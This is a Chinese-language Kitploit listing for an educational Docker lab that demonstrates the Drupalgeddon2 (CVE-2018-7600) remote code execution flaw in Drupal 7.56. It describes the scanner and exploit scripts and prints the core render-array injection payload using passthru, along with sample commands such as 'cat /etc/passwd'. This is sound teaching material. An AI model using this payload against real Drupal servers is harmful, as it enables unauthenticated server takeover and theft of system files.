Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/meraj1312/cve-2018-7600-drupalgeddon2-lab
漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育Payload 开发实验室与实践
GitHub

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
meraj1312/cve-2018-7600-drupalgeddon2-lab

cve-2018-7600-drupalgeddon2-lab

演示使用基于 Docker 的易受攻击的 Drupal 7.56 环境进行 CVE-2018-7600 (Drupalgeddon2) 远程代码执行的教学实验室。

查看仓库
114个月前尚未审核

CVE-2018-7600 Drupalgeddon2 漏洞实验室

一个教育性实验室,通过使用 Docker 部署的存在漏洞的 Drupal 7.56 环境,演示如何利用 CVE-2018-7600(Drupalgeddon2)。

本项目模拟真实世界的漏洞评估工作流程,包括:

  • 漏洞环境搭建
  • 检测(扫描器)
  • 利用(RCE)
  • Payload 分析
  • 文档

漏洞概述

CVE-2018-7600(Drupalgeddon2)是 Drupal CMS 中的一个严重远程代码执行(RCE)漏洞。

该问题存在于 Drupal 的 Form API 中,用户可控的输入可被解释为渲染数组(render arrays),从而允许攻击者注入恶意回调,例如:

  • passthru
  • system
  • exec

这会导致在服务器上无需认证即可执行命令。

影响

  • 远程代码执行
  • 无需认证
  • 服务器完全失陷

目标版本

  • Drupal 7.56(存在漏洞)

实验室架构

root@kitploit:~

Attacker (Kali Linux)
|
| HTTP Requests
v
Drupal 7.56 (Vulnerable)
|
v
MySQL Database


使用的技术

  • Docker
  • Docker Compose
  • Drupal CMS
  • MySQL
  • Kali Linux
  • Python(利用与扫描器)

仓库结构

root@kitploit:~

cve-2018-7600-drupalgeddon2-lab
│
├── README.md
├── setup.md
├── scan.py
├── exploit.py
│
├── lab-setup/
│   └── docker-compose.yml
│
├── screenshots/
│   ├── drupal-dashboard.png
│   ├── drupal-version.png
│   └── rce-output.png
│
├── logs/
│   ├── scan_results.txt
│   └── exploit_log.txt
│
├── payloads/
│   └── payload-list.txt
│
├── report/
│   └── drupalgeddon2-report.pdf


截图

Drupal 仪表盘

Drupal Dashboard

版本确认

Drupal Version


快速开始

克隆仓库

root@kitploit:~
git clone https://github.com/Meraj1312/cve-2018-7600-drupalgeddon2-lab.git
cd cve-2018-7600-drupalgeddon2-lab

启动实验室

root@kitploit:~
docker compose up -d

访问目标

root@kitploit:~
http://localhost:8080

检测与利用

1. 扫描漏洞

root@kitploit:~
python3 scan.py http://localhost:8080

示例输出:

root@kitploit:~
[~] Scanning http://localhost:8080... VULNERABLE

2. 利用(RCE)

root@kitploit:~
python3 exploit.py http://localhost:8080 id

示例输出:

root@kitploit:~
uid=33(www-data) gid=33(www-data)

Payload 示例

使用的基本 payload 结构:

root@kitploit:~
name[#post_render][]=passthru
name[#type]=markup
name[#markup]=whoami

示例命令:

root@kitploit:~
whoami
id
cat /etc/passwd

完整 payload 列表位于:

root@kitploit:~
payloads/payload-list.txt

文档策略

为保持干净且专业的仓库结构:

README 包含:

  • 漏洞概述
  • 实验室搭建说明
  • 基本 payload 示例
  • 如何运行扫描器与利用脚本

PDF 报告(report/drupalgeddon2-report.pdf)包含:

  • 详细的利用步骤
  • Burp Suite 请求与响应
  • Payload 测试结果
  • 执行截图
  • 漏洞技术详解

这种分离确保了:

  • 整洁的 GitHub 展示
  • 完整的技术文档

教育目的

本实验室面向:

  • 网络安全学生
  • 渗透测试实践
  • 漏洞研究
  • 漏洞利用开发学习

免责声明

本项目仅用于教育和研究目的。

未经明确授权,请勿尝试攻击任何系统。

作者不对任何滥用行为负责。

下载工具